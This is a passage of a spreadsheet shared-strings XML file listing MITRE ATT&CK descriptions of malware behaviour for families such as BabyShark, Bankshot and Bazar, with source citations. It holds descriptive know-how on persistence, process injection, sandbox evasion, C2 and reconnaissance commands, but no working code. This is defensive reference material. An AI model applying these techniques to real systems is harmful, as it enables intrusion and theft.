    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has collected the victim machine's local IP address information and MAC address.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has modified file and directory timestamps.(Citation: US-CERT BLINDINGCAN Aug 2020)(Citation: NHS UK BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has used HTTPS over port 443 for command and control.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BLINDINGCAN](https://attack.mitre.org/software/S0520) has executed commands via cmd.exe.(Citation: US-CERT BLINDINGCAN Aug 2020)</t>
  </si>
  <si>
    <t>[BONDUPDATER](https://attack.mitre.org/software/S0360) can use DNS and TXT records within its DNS tunneling protocol for command and control.(Citation: Palo Alto OilRig Sep 2018)</t>
  </si>
  <si>
    <t>[BONDUPDATER](https://attack.mitre.org/software/S0360) uses a DGA to communicate with command and control servers.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[BONDUPDATER](https://attack.mitre.org/software/S0360) uses &lt;code&gt;-windowstyle hidden&lt;/code&gt; to conceal a [PowerShell](https://attack.mitre.org/techniques/T1059/001) window that downloads a payload.(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>[BONDUPDATER](https://attack.mitre.org/software/S0360) can download or upload files from its C2 server.(Citation: Palo Alto OilRig Sep 2018)</t>
  </si>
  <si>
    <t>[BONDUPDATER](https://attack.mitre.org/software/S0360) is written in PowerShell.(Citation: FireEye APT34 Dec 2017)(Citation: Palo Alto OilRig Sep 2018)</t>
  </si>
  <si>
    <t>[BONDUPDATER](https://attack.mitre.org/software/S0360) persists using a scheduled task that executes every minute.(Citation: Palo Alto OilRig Sep 2018)</t>
  </si>
  <si>
    <t>[BONDUPDATER](https://attack.mitre.org/software/S0360) can read batch commands in a file sent from its C2 server and execute them with cmd.exe.(Citation: Palo Alto OilRig Sep 2018)</t>
  </si>
  <si>
    <t>[BOOSTWRITE](https://attack.mitre.org/software/S0415) has been signed by a valid CA.(Citation: FireEye FIN7 Oct 2019)</t>
  </si>
  <si>
    <t>[BOOSTWRITE](https://attack.mitre.org/software/S0415) has exploited the loading of the legitimate Dwrite.dll file by actually loading the gdi library, which then loads the gdiplus library and ultimately loads the local Dwrite dll.(Citation: FireEye FIN7 Oct 2019)</t>
  </si>
  <si>
    <t>[BOOSTWRITE](https://attack.mitre.org/software/S0415) has used a a 32-byte long multi-XOR key to decode data inside its payload.(Citation: FireEye FIN7 Oct 2019)</t>
  </si>
  <si>
    <t>[BOOSTWRITE](https://attack.mitre.org/software/S0415) has encoded its payloads using a ChaCha stream cipher with a 256-bit key and 64-bit Initialization vector (IV) to evade detection.(Citation: FireEye FIN7 Oct 2019)</t>
  </si>
  <si>
    <t>[BOOSTWRITE](https://attack.mitre.org/software/S0415) has used the DWriteCreateFactory() function to load additional modules.(Citation: FireEye FIN7 Oct 2019)</t>
  </si>
  <si>
    <t>Bootkit</t>
  </si>
  <si>
    <t>[BOOTRASH](https://attack.mitre.org/software/S0114) is a Volume Boot Record (VBR) bootkit that uses the VBR to maintain persistence.(Citation: Mandiant M Trends 2016)(Citation: FireEye Bootkits)(Citation: FireEye BOOTRASH SANS)</t>
  </si>
  <si>
    <t>Hidden File System</t>
  </si>
  <si>
    <t>[BOOTRASH](https://attack.mitre.org/software/S0114) has used unallocated disk space between partitions for a hidden file system that stores components of the Nemesis bootkit.(Citation: FireEye Bootkits)</t>
  </si>
  <si>
    <t>[BS2005](https://attack.mitre.org/software/S0014) uses Base64 encoding for communication in the message body of an HTTP request.(Citation: Villeneuve et al 2014)</t>
  </si>
  <si>
    <t>[BUBBLEWRAP](https://attack.mitre.org/software/S0043) can communicate using SOCKS.(Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>[BUBBLEWRAP](https://attack.mitre.org/software/S0043) collects system information, including the operating system version and hostname.(Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>[BUBBLEWRAP](https://attack.mitre.org/software/S0043) can communicate using HTTP or HTTPS.(Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has the ability to decode downloaded files prior to execution.(Citation: CISA AA20-301A Kimsuky)</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has cleaned up all files associated with the secondary payload execution.(Citation: Unit42 BabyShark Apr 2019)</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has used &lt;code&gt;dir&lt;/code&gt; to search for "programfiles" and "appdata".(Citation: Unit42 BabyShark Feb 2019)</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has downloaded additional files from the C2.(Citation: Unit42 BabyShark Apr 2019)(Citation: CISA AA20-301A Kimsuky)</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has a [PowerShell](https://attack.mitre.org/techniques/T1059/001)-based remote administration ability that can implement a PowerShell or C# based keylogger.(Citation: Unit42 BabyShark Apr 2019)</t>
  </si>
  <si>
    <t>Mshta</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has used mshta.exe to download and execute applications from a remote server.(Citation: CISA AA20-301A Kimsuky)</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has executed the &lt;code&gt;tasklist&lt;/code&gt; command.(Citation: Unit42 BabyShark Feb 2019)</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has executed the &lt;code&gt;reg query&lt;/code&gt; command for &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default&lt;/code&gt;.(Citation: Unit42 BabyShark Feb 2019)</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has added a Registry key to ensure all future macros are enabled for Microsoft Word and Excel as well as for additional persistence.(Citation: Unit42 BabyShark Feb 2019)(Citation: CISA AA20-301A Kimsuky)</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has used scheduled tasks to maintain persistence.(Citation: Crowdstrike GTR2020 Mar 2020)</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has encoded data using [certutil](https://attack.mitre.org/software/S0160) before exfiltration.(Citation: Unit42 BabyShark Feb 2019)</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has executed the &lt;code&gt;ver&lt;/code&gt; command.(Citation: Unit42 BabyShark Feb 2019)</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has executed the &lt;code&gt;ipconfig /all&lt;/code&gt; command.(Citation: Unit42 BabyShark Feb 2019)</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has executed the &lt;code&gt;whoami&lt;/code&gt; command.(Citation: Unit42 BabyShark Feb 2019)</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has used cmd.exe to execute commands.(Citation: Unit42 BabyShark Feb 2019)</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has been signed with self signed digital certificates mimicking a legitimate software company.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has used a custom routine to decrypt strings.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has the ability to remove files and folders related to previous infections.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has the ability to identify folders and files related to previous infections.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has the ability to set folders or files to be hidden from the Windows Explorer default view.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) can download and execute additional payloads on a compromised host.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has compromised victims via links to URLs hosting malicious content.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has hidden malicious payloads in &lt;code&gt;%USERPROFILE%\Adobe\Driver\dwg\&lt;/code&gt; and mimicked the legitimate DHCP service binary.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) can leverage API functions such as &lt;code&gt;ShellExecuteA&lt;/code&gt; and &lt;code&gt;HttpOpenRequestA&lt;/code&gt; in the process of downloading and executing files.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has used compressed and decimal encoded VBS scripts.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>Office Template Macros</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has the ability to use hidden columns in Excel spreadsheets to store executable files or commands for VBA macros.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has the ability to use scheduled tasks to repeatedly execute malicious payloads on a compromised host.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has the ability to gather the victim's computer name.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has used VBS to install its downloader component and malicious documents with VBA macro code.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has the ability to use HTTPS for C2 communiations.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) can download and run batch files to execute commands on a compromised host.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) writes collected data to a temporary file in an encrypted form before exfiltration to a C2 server.(Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>Some [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) samples contain a publicly available Web browser password recovery tool.(Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>Email Account</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) collects address book information from Outlook.(Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) contains a cleanup module that removes traces of itself from the victim.(Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) collects information about available drives, default browser, desktop file list, My Documents, Internet history, program files, and root of available drives. It also searches for ICS-related software files.(Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) collects information about running processes.(Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) injects itself into explorer.exe.(Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) adds Registry Run keys to achieve persistence.(Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>Some [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) samples use standard Base64 + bzip2, and some use standard Base64 + reverse XOR + RSA-2048 to decrypt data received from C2 servers.(Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) collects information about the OS and computer name.(Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) collects information about the Internet adapter configuration.(Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) collects the current username from the victim.(Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) collects files from the local system that have the following extensions, then prepares them for exfiltration: .xls, .xlsx, .pdf, .mdb, .rar, .zip, .doc, .docx.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) searches for files with specific file extensions.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) can download and execute or update malware.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) has a keylogging capability.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) stores collected data in log files before exfiltration.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) uses SMTP for C2.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) establishes a foothold by adding a link to the malware executable in the startup folder.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) captures screenshots in .jpg format and then exfiltrates them.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) uses WMI to enumerate installed security products in the victim’s environment.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) attempts to detect if it is being run in a Virtual Machine (VM) using a WMI query for disk drive name, BIOS, and motherboard information. (Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) collects the OS system, OS version, MAC address, and the computer name from the victim’s machine.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) uses HTTP for C2.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) has modules that are capable of capturing audio.(Citation: EFF Manul Aug 2016)</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) contains keylogging capabilities(Citation: BH Manul Aug 2016)</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) has been launched by starting iexplore.exe and replacing it with [Bandook](https://attack.mitre.org/software/S0234)'s payload.(Citation: Lookout Dark Caracal Jan 2018)(Citation: EFF Manul Aug 2016)</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) is capable of taking an image of and uploading the current desktop.(Citation: Lookout Dark Caracal Jan 2018)</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) has modules that are capable of capturing from a victim's webcam.(Citation: EFF Manul Aug 2016)</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) is capable of spawning a Windows command shell.(Citation: EFF Manul Aug 2016)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) recursively generates a list of files within a directory and sends them back to the control server.(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) grabs a user token using WTSQueryUserToken and then creates a process by impersonating a logged-on user.(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) collects files from the local system.(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) decodes embedded XOR strings.(Citation: US-CERT Bankshot Dec 2017)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) gathers domain and account names/information through process monitoring.(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) exfiltrates data over its C2 channel.(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) leverages a known zero-day vulnerability in Adobe Flash to execute the implant into the victims’ machines.(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) marks files to be deleted upon the next system reboot and uninstalls and removes itself from the system.(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) searches for files on the victim's machine.(Citation: US-CERT Bankshot Dec 2017)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) deletes all artifacts associated with the malware from the infected machine.(Citation: US-CERT Bankshot Dec 2017)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) uploads files and secondary payloads to the victim's machine.(Citation: US-CERT Bankshot Dec 2017)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) writes data into the Registry key &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Pniumj&lt;/code&gt;.(Citation: US-CERT Bankshot Dec 2017)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) creates processes using the Windows API calls: CreateProcessA() and CreateProcessAsUserA().(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) encodes commands from the control server using a range of characters and gzip.(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) binds and listens on port 1058 for HTTP traffic while also utilizing a FakeTLS method.(Citation: US-CERT Bankshot Dec 2017)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) identifies processes and collects the process ids.(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) generates a false TLS handshake using a public certificate to disguise C2 network communications.(Citation: US-CERT Bankshot Dec 2017)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) searches for certain Registry keys to be configured before executing the payload.(Citation: US-CERT Bankshot Dec 2017)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) gathers system information, network addresses, disk type, disk free space, and the operation system version.(Citation: McAfee Bankshot)(Citation: US-CERT Bankshot Dec 2017)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) modifies the time of a file as specified by the control server.(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) uses HTTP for command and control communication.(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) uses the command-line interface to execute arbitrary commands.(Citation: McAfee Bankshot)(Citation: US-CERT Bankshot Dec 2017)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) can terminate a specific process by its process id.(Citation: McAfee Bankshot)(Citation: US-CERT Bankshot Dec 2017)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can use TLS in C2 communications.(Citation: Zscaler Bazar September 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) has been downloaded via Windows BITS functionality.(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) has been signed with fake certificates including those appearing to be from VB CORPORATE PTY. LTD.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can retrieve information from the infected machine.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can decrypt downloaded payloads. [Bazar](https://attack.mitre.org/software/S0534) also resolves strings and API calls at runtime.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) has manually loaded ntdll from disk in order to identity and remove API hooks set by security products.(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) has the ability to identify domain administrator accounts.(Citation: NCC Group Team9 June 2020)(Citation: DFIR Ryuk's Return October 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can implement DGA using the current date as a seed variable.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can use [Nltest](https://attack.mitre.org/software/S0359) tools to obtain information about the domain.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) has the ability to use an alternative C2 server if the primary server fails.(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can delete its loader using a batch file in the Windows temporary folder.(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can enumerate the victim's desktop.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534)'s loader can delete scheduled tasks created by a previous instance of the malware.(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can download and deploy additional payloads including ransomware and post-exploitation frameworks such as [Cobalt Strike](https://attack.mitre.org/software/S0154).(Citation: Cybereason Bazar July 2020)(Citation: Zscaler Bazar September 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can identify administrator accounts on an infected host.(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can gain execution via malicious links to decoy landing pages hosted on Google Docs.(Citation: Cybereason Bazar July 2020)(Citation: Zscaler Bazar September 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can create a task named to appear benign.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>The [Bazar](https://attack.mitre.org/software/S0534) loader has used dual-extension executable files such as PreviewReport.DOC.exe.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>The [Bazar](https://attack.mitre.org/software/S0534) loader has named malicious shortcuts adobe.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>The [Bazar](https://attack.mitre.org/software/S0534) loader is used to download and execute the [Bazar](https://attack.mitre.org/software/S0534) backdoor.(Citation: Cybereason Bazar July 2020)(Citation: Zscaler Bazar September 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can use various APIs to allocate memory and facilitate code execution/injection.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can enumerate shared drives on the domain.(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) has used XOR, RSA2, and RC4 encrypted files.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can execute a PowerShell script received from C2.(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can identity the current process on a compromised host.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>Process Doppelgänging</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can inject into a target process using process doppelgänging.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can inject into a target process including Svchost, Explorer, and cmd using process hollowing.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can inject code through calling &lt;code&gt;VirtualAllocExNuma&lt;/code&gt;.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can query &lt;code&gt;Windows\CurrentVersion\Uninstall&lt;/code&gt; for installed applications.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can create or add files to Registry Run Keys to establish persistence.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can enumerate remote systems using &lt;code&gt; Net View&lt;/code&gt;.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can create a scheduled task for persistence.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can identify the installed antivirus engine.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can establish persistence by writing shortcuts to the Windows Startup folder.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can query the Registry for installed applications.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) has a variant with a packed payload.(Citation: Cybereason Bazar July 2020)(Citation: Zscaler Bazar September 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) has been spread via e-mails with embedded malicious links.(Citation: Cybereason Bazar July 2020)(Citation: Zscaler Bazar September 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can send C2 communications with XOR encryption.(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can fingerprint architecture, computer name, and OS version on the compromised host. [Bazar](https://attack.mitre.org/software/S0534) can also check if the Russian language is installed on the infected machine and terminate if it is found.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can collect the IP address and NetBIOS name of an infected machine.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can identify the username of the infected user.(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can collect the time on the compromised host.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can use a timer to delay execution of core functionality.(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can attempt to overload sandbox analysis by sending 1550 calls to &lt;code&gt;printf&lt;/code&gt;.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can use HTTP and HTTPS over ports 80 and 443 in C2 communications.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) downloads have been hosted on Google Docs.(Citation: Cybereason Bazar July 2020)(Citation: Zscaler Bazar September 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can launch cmd.exe to perform reconnaissance commands.(Citation: Cybereason Bazar July 2020)(Citation: Zscaler Bazar September 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can execute a WMI query to gather information about the installed antivirus engine.(Citation: Cybereason Bazar July 2020)(Citation: DFIR Ryuk's Return October 2020)</t>
  </si>
  <si>
    <t>Winlogon Helper DLL</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can use Winlogon Helper DLL to establish persistence.(Citation: Zscaler Bazar September 2020)</t>
  </si>
  <si>
    <t>[BendyBear](https://attack.mitre.org/software/S0574) has decrypted function blocks using a XOR key during runtime to evade detection.(Citation: Unit42 BendyBear Feb 2021)</t>
  </si>
  <si>
    <t>[BendyBear](https://attack.mitre.org/software/S0574) is designed to download an implant from a C2 server.(Citation: Unit42 BendyBear Feb 2021)</t>
  </si>
  <si>
    <t>Junk Data</t>
  </si>
  <si>
    <t>[BendyBear](https://attack.mitre.org/software/S0574) has used byte randomization to obscure its behavior.(Citation: Unit42 BendyBear Feb 2021)</t>
  </si>
  <si>
    <t>[BendyBear](https://attack.mitre.org/software/S0574) can load and execute modules and Windows Application Programming (API) calls using standard shellcode API hashing.(Citation: Unit42 BendyBear Feb 2021)</t>
  </si>
  <si>
    <t>[BendyBear](https://attack.mitre.org/software/S0574) has used a custom RC4 and XOR encrypted protocol over port 443 for C2.(Citation: Unit42 BendyBear Feb 2021)</t>
  </si>
  <si>
    <t>[BendyBear](https://attack.mitre.org/software/S0574) has encrypted payloads using RC4 and XOR.(Citation: Unit42 BendyBear Feb 2021)</t>
  </si>
  <si>
    <t>[BendyBear](https://attack.mitre.org/software/S0574) can query the host's Registry key at &lt;code&gt;HKEY_CURRENT_USER\Console\QuickEdit&lt;/code&gt; to retrieve data.(Citation: Unit42 BendyBear Feb 2021)</t>
  </si>
  <si>
